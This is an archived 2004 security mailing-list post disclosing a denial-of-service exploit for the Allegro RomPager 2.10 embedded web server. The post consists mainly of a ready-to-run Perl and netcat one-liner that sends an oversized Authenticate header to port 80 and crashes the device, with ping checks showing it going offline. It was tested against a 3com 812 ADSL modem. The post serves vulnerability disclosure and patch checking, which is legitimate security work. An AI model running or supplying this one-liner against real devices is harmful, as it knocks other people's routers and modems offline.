Allegro RomPager/2.10 DoS exploit

From: Seth Alan Woolley (seth_at_tautology.org)
Date: 05/22/04

  • Next message: Mandrake Linux Security Team: "MDKSA-2004:050 - Updated kernel packages fix multiple vulnerabilities"
    Date: Sat, 22 May 2004 01:33:13 -0700
    To: vuldb@securityfocus.com, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
    
    
    

    The description made it easy to create this one. Needed this to confirm
    if some 2.10-branded products were in fact patched and warranted
    replacing. Considering there was four years of warning and there are
    still tons of boxes with this problem, please, people, get your systems
    pen-tested.

    http://www.securityfocus.com/bid/1290/discussion/
    http://www.securityfocus.com/bid/1290/exploit/ (none yet)
    http://www.allegrosoft.com/rpproduct.html

    $ ip_address="some.ip.add.ress"
    $ ping $ip_address # works

    the one-liner:
    $ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80

    $ ping $ip_address # doesn't work

    Tested against a 3com 812 adsl modem.

    This email is in the Public Domain.

    -- 
    Seth Alan Woolley [seth at positivism.org], SPAM/UCE is unauthorized
    Key id EF10E21A = 36AD 8A92 8499 8439 E6A8  3724 D437 AF5D EF10 E21A
    http://smgl.positivism.org:11371/pks/lookup?op=get&search=0xEF10E21A
    Security Team Leader Source Mage GNU/Linux http://www.sourcemage.org
    
    



  • Next message: Mandrake Linux Security Team: "MDKSA-2004:050 - Updated kernel packages fix multiple vulnerabilities"

    Relevant Pages

    • [Full-Disclosure] Allegro RomPager/2.10 DoS exploit
      ... replacing. ... $ ping $ip_address # doesn't work ... Tested against a 3com 812 adsl modem. ... Seth Alan Woolley, ...
      (Full-Disclosure)
    • Allegro RomPager/2.10 DoS exploit
      ... replacing. ... $ ping $ip_address # doesn't work ... Tested against a 3com 812 adsl modem. ... Seth Alan Woolley, ...
      (Full-Disclosure)
    • Re: has ping been dropped from 1.9.1?
      ... but don't go modifying your standard library. ... I would agree with you if I was replacing ... Find or something with a 1.8 distro file, ... If ping is re-added in a future release, the 1.8v of ping will be ...
      (comp.lang.ruby)